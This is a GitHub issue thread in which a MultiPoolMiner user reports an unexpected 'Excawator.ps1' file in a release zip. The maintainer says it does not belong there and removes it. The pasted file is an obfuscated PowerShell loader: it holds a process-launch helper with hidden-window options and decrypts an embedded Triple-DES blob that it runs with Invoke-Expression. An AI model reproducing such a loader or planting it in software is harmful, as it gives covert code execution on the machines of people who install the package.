### ISSUE TITLE
"Excawator.ps1" in MinersLegacy Folder

### ISSUE THREAD

**Issue by ColoradoJames** [MultiPoolMiner/MultiPoolMiner#2215]
Good day! 

I just downloaded the new version of MultiPoolMiner (3.0.1). I'm getting an error with the "Excawator.ps1" file in the MinersLegacy folder. This looks like a file I should delete. Thoughts?

**Comment by UselessGuru** [comment]
This file is not part of the MPM zip... What date/timestamp does it have? Would you mind posting the file here?

**Comment by ColoradoJames** [comment]
I was part of the zip: MultiPoolMiner_3.0.1_Release.zip that I downloaded from 
https://github.com/MultiPoolMiner/MultiPoolMiner/releases
It appears to be similar to the other ps1 files, other than the name.

File below...
-------------------------------------

function Invoke-CreateProcess {
<#
.SYNOPSIS

     -Binary            Full path of the module to be executed.
                       
     -Args              Arguments to pass to the module, e.g. "/c calc.exe". Defaults
                        to $null if not specified.
                       
     -CreationFlags     Process creation flags:
                          0x00000000 (NONE)
                          0x00000001 (DEBUG_PROCESS)
                          0x00000002 (DEBUG_ONLY_THIS_PROCESS)
                          0x00000004 (CREATE_SUSPENDED)
                          0x00000008 (DETACHED_PROCESS)
                          0x00000010 (CREATE_NEW_CONSOLE)
                          0x00000200 (CREATE_NEW_PROCESS_GROUP)
                          0x00000400 (CREATE_UNICODE_ENVIRONMENT)
                          0x00000800 (CREATE_SEPARATE_WOW_VDM)
                          0x00001000 (CREATE_SHARED_WOW_VDM)
                          0x00040000 (CREATE_PROTECTED_PROCESS)
                          0x00080000 (EXTENDED_STARTUPINFO_PRESENT)
                          0x01000000 (CREATE_BREAKAWAY_FROM_JOB)
                          0x02000000 (CREATE_PRESERVE_CODE_AUTHZ_LEVEL)
                          0x04000000 (CREATE_DEFAULT_ERROR_MODE)
                          0x08000000 (CREATE_NO_WINDOW)
                        
     -ShowWindow        Window display flags:
                          0x0000 (SW_HIDE)
                          0x0001 (SW_SHOWNORMAL)
                          0x0001 (SW_NORMAL)
                          0x0002 (SW_SHOWMINIMIZED)
                          0x0003 (SW_SHOWMAXIMIZED)
                          0x0003 (SW_MAXIMIZE)
                          0x0004 (SW_SHOWNOACTIVATE)
                          0x0005 (SW_SHOW)
                          0x0006 (SW_MINIMIZE)
                          0x0007 (SW_SHOWMINNOACTIVE)
                          0x0008 (SW_SHOWNA)
                          0x0009 (SW_RESTORE)
                          0x000A (SW_SHOWDEFAULT)
                          0x000B (SW_FORCEMINIMIZE)
                          0x000B (SW_MAX)
						  
     -StartF            Bitfield to influence window creation:
                          0x00000001 (STARTF_USESHOWWINDOW)
                          0x00000002 (STARTF_USESIZE)
                          0x00000004 (STARTF_USEPOSITION)
                          0x00000008 (STARTF_USECOUNTCHARS)
                          0x00000010 (STARTF_USEFILLATTRIBUTE)
                          0x00000020 (STARTF_RUNFULLSCREEN)
                          0x00000040 (STARTF_FORCEONFEEDBACK)
                          0x00000080 (STARTF_FORCEOFFFEEDBACK)
                          0x00000100 (STARTF_USESTDHANDLES)


#>

	param (
        [Parameter(Mandatory = $True)]
		[string]$Binary,
        [Parameter(Mandatory = $False)]
		[string]$Args=$null,
        [Parameter(Mandatory = $True)]
		[string]$CreationFlags,
        [Parameter(Mandatory = $True)]
		[string]$ShowWindow,
        [Parameter(Mandatory = $True)]
		[string]$StartF
	)  

    # Define all the structures for CreateProcess
	Add-Type -TypeDefinition @"
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	
	[StructLayout(LayoutKind.Sequential)]
	public struct PROCESS_INFORMATION
	{
		public IntPtr hProcess; public IntPtr hThread; public uint dwProcessId; public uint dwThreadId;
	}
	
	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
	public struct STARTUPINFO
	{
		public uint cb; public string lpReserved; public string lpDesktop; public string lpTitle;
		public uint dwX; public uint dwY; public uint dwXSize; public uint dwYSize; public uint dwXCountChars;
		public uint dwYCountChars; public uint dwFillAttribute; public uint dwFlags; public short wShowWindow;
		public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput;
		public IntPtr hStdError;
	}
	
	[StructLayout(LayoutKind.Sequential)]
	public struct SECURITY_ATTRIBUTES
	{
		public int length; public IntPtr lpSecurityDescriptor; public bool bInheritHandle;
	}
	
	public static class Kernel32
	{
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern bool CreateProcess(
			string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, 
			ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, 
			IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, 
			out PROCESS_INFORMATION lpProcessInformation);

                [DllImport("Kernel32.dll", SetLastError = true)]
                public static extern UInt32 WaitForSingleObject(IntPtr handle, UInt32 milliseconds);       

	}
                
"@
	
	# StartupInfo Struct
	$StartupInfo = New-Object STARTUPINFO
	$StartupInfo.dwFlags = $StartF # StartupInfo.dwFlag
	$StartupInfo.wShowWindow = $ShowWindow # StartupInfo.ShowWindow
	$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
	
	# ProcessInfo Struct
	$ProcessInfo = New-Object PROCESS_INFORMATION
	
	# SECURITY_ATTRIBUTES Struct (Process & Thread)
	$SecAttr = New-Object SECURITY_ATTRIBUTES
	$SecAttr.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SecAttr)
	
	# CreateProcess --> lpCurrentDirectory
	$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
	
	# Call CreateProcess
	[Kernel32]::CreateProcess($Binary, $Args, [ref] $SecAttr, [ref] $SecAttr, $false, $CreationFlags, [IntPtr]::Zero, $GetCurrentPath, [ref] $StartupInfo, [ref] $ProcessInfo) |out-null
	[Kernel32]::WaitForSingleObject($ProcessInfo.hProcess,0xFFFFFFF) |out-null
}


function de([String] $b, [String] $c)
{
$a = "8NYbnCEArTc2pcEIi6pfwVkTKB/K6unRxVxgFvtk0yucsDhfeQR1Xx5HJI7+mqMio8+s9mZt8v5G4HpDZzyhhlTfm9XQuNsVAgRkNj47PQg/nttYXyIcDyPMtpU0HKB8vJS119Z2dGEDTSHoC/DwMSYb70n7vwVHnnM4Te8w37ybb3luyETIVLX12u9YZSqgKvr8y6tmvtEOKaHRStZOSkmjKNWI6iiyjt+0xxcxUF9xGggmaCjEK/j3ByZWNRVxdfIg7hNNzrxXZX7ElNtTA8laSlTO6D8kyzA476K9CVTGI+Nd3fl7xZ64WM/pFDf/6CXalBKDJIgLIlRh/CLbWIds3eHZZZsUOF3JhPmyILwMnCRx5YuUv9w8Gf0YR7HrKfZznZL42pQrOtiRdd6VRUfQFRiy8HMDu4dncqb3Wi6wNRNY7BLrCsZ9Ch8ItFyz38AIbl+oLdacaBxe+2luCJYpxq3GheUsKffOuNFuQdc8ykg+edndvqlyQ9wHATecKcQhzPLP3FIJ9oJuF0Dpu3n+HhgceURJwvrDmOOCcwxaxe80WcBAfT2Ybc0q013lXCW0eeuUzJvpsutsMinrbeUVQ6x8A70SYdHKCUllyyOah0vUqMEAK9R9LKcw11Qs+KJstkw9A4/6CxmA891ipbuEEd+rH38iCQe09G6gH7G2R+XuiQrDXkJ2XTRtb92RHI6/JDMfATotsOGcqz0gNaFzRW7X9nyEy07ZRtuGpDfHwNfTkW6k2fe6V20ETp3h5UVCqndRvhb+kd4KrcO2M2/udTUltiF8FPGgvy3l0SO/HCowgZaYoMILzUUA4ixZOmHk2KMnxaEt4k08/qzAuMycFRnV/cjF8S/GEaWvUeKvWJ+C9CAMIx/Q93+ZiEj2Yr6NQeOOACOyvEye/YmVt/yyzNvWNoHwFulIqCtiN1UFEHxDr3YwFnFhyzOpWhkEGGNp5OcSV8OnSf2mmGfucGQXPi8WpkeIMz/xKA742bQOlnCI2SqtlyD/05PEOoSdZqEyAxIc6wycewiGfZBiFHJdiFmYA/lXNlbrUHg8OJY12HBYjnlAOnEMxc04OMvVcPwF/09s/Q0e7OJM38crmFubUz66vhhoUK4fs2H/Eifq/+vDUEUx8H1SKMT8/Tl73uyqDYZ2809ZI7S2Sdd2UPyUFH6UdwIEJa0GPDRKi0QBfsgwKMcmewdwVxsxj6nWBbb48KUqylW/08tgYlCnkU7VEeqndd5ITvnRyAkWPp8IuQruGRkYEg==";
$encoding = New-Object System.Text.ASCIIEncoding;
$dd = $encoding.GetBytes("HPKWBLMFDQMEPXCT");
$aa = [Convert]::FromBase64String($a);
$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2);
[Byte[]] $e = $derivedPass.GetBytes(16);
$f = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;
$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
[Byte[]] $h = New-Object Byte[]($aa.Length);
$g = $f.CreateDecryptor($e, $dd);
$i = New-Object System.IO.MemoryStream($aa, $True);
$j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read);
$r = $j.Read($h, 0, $h.Length);
$i.Close();
$j.Close();
$f.Clear();
if (($h.Length -gt 3) -and ($h[0] -eq 0xEF) -and ($h[1] -eq 0xBB) -and ($h[2] -eq 0xBF)) { $h = $h[3..($h.Length-1)]; }
return $encoding.GetString($h).TrimEnd([Char] 0);
}



$Wallet = de Wallet 1Q24z7gHPDbedkaWDTFqhMF8g7iHMehsCb
Invoke-Expression $Wallet

**Comment by UselessGuru** [comment]
That file should clearly not be in that zip file - I've fixed it in the download.

Why don't you use https://github.com/MultiPoolMiner/MultiPoolMiner/releases/tag/3.1.0? This will give you full Cryptonight V8 support.

**Comment by ColoradoJames** [comment]
Thank you for looking at this.

I'll download 3.1.0 right now! Thanks again.
